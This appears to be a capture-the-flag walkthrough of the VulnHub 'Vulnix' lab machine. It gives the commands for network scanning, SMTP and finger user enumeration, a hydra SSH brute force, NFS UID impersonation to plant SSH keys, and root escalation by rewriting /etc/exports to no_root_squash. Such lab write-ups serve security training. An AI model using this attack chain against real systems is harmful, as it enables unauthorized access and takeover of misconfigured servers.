HACKLAB: VULNIX vulnhub walkthrough
vulnix is vulnerable box and it is available from vulnhub you can downlod this box using this link
download vulnix box and configure it on virtual box
let’s start enumeration :
first looking for vulnerable box ip address so we use netdiscover command for scaning ip address
$ sudo netdiscovernow using nmap scan port and all port and identify how many port open on vulnix box
$ nmap -v -p- 192.168.1.206
now scan with default script and version detection
$ sudo nmap -sC -sV -sT -sU -A -p 22,25,79,110,111,143,512,513,514,993,995,2049,44246,44396,50666,53444,60055 192.168.1.206
we see port 22 ,25 79,110,111,143,512,513,514,993,2049 which have running known services
let’s enumerate smtp port 25
$ telnet 192.168.1.206 25
we check smtp service is running properly on port 25
now enumerate smtp with smtp-user-enum tool in kali linux for user enumeration
$ smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.206
now we have smtp users now create a user file
$ vim user.txt
now cut users form field 2
$ cat user.txt |cut -d " " -f 2
$ cat user.txt |cut -d " " -f 2 >users.txt
now trying enumerate next port 79 which have running fingure service
clone this pentest monkey repo AND enumerate fingure service
let’s execute pentest monkey repo
$ ./finger-user-enum.pl -U ../users.txt -t 192.168.1.206
we see only one user home directory is exist
now we have user whose home directory is exist now next we have nfs service so let’s enumerate nfs service
$ showmount -e 192.168.1.206
now mount nfs service data
$ sudo mount -t nfs 192.168.1.206:/home/vulnix /mnt/data/
we don’t have permission to access this share folder
now we have a problem because root squashing is enabled so we don’t read this directory content
after enumerating all services we don’t find sensitive content now let’s bruetforce on ssh with those home directory is exist so we have only one user :user now bruteforce with this user
$ hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.1.206 ssh
now we found password let’s login with user on ssh
$ ssh user@192.168.1.206
password: letmein
now let’s next aproch for privellage escallation let’s
here we don’t have any informational data but we have /etc/passwd file in this file have user vulnix UID and GID let’s now copy user vulnix uid and make a user with same name and same uid on your local pc and let’s enumerate nfs again maybe nfs permission denied error solved
$ cat /etc/passwd
see unlnix UID and GID now add a user vulnix with uid 2008 on your local pc for accessing nfs
$ sudo useradd -u 2008 vulnix
now we have vulnix user now switch vulnix user and mount nfs content
$ showmount -e 192.168.1.206
$ sudo mount -t nfs 192.168.1.206:/home/vulnix /mnt/data/
now set password on vulnix user using passwd command and login
$ sudo passwd vulnix
$ su vulnix
we have sh shell now convert sh to bash shell and see content on mount directory
now make a directory on nfs share location
now generate ssh-key and past authorized_keys file on .ssh directory
$ ssh-keygen
ssh-key is generate properly now past id_rsa.pub file on /tmp directory because tmp directory have 777 permission
$ cp /home/hide/.ssh/id_rsa.pub /tmp/
copy id_rsa.pub from /tmp/id_rsa.pub
$ cp /tmp/id_rsa.pub authorized_keys
now giving permission id_rsa file 600 and make connection
$ chmod 600 id_rsa
$ ssh -i id_rsa vulnix@192.168.1.206let’s enumerate vulnix user
$ sudo -l
we have sudo writes for changing /etc/exports/ nfs configuration file let’ see nfs configuration file
$ cat /etc/exportsnow misconfigure this file replace root_squash to no_root_squash and add user root on this file
/root *(rw,no_root_squash)
now save and exit and restart the box for nfs service restart after restart you will see
after restarting box again we press command showmount for mounting devices
$ showmount -e 192.168.1.206
now again mount root user
$ sudo mount -t nfs 192.168.1.206:/root /mnt/data2
now switch normal user to root and access nfs share
we have root user privilage if you want to access root user you can upload id_rsa.pub file on root directory
now we have complete root privilege and we have trophy.txt
happy hacking :)
